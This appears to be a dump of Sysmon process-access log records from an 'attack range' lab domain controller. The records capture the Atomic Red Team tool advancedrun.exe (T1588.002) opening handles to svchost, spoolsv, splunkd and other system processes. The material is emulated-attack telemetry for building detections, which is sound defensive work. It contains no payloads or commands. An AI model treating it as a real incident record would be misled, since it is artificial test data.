17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
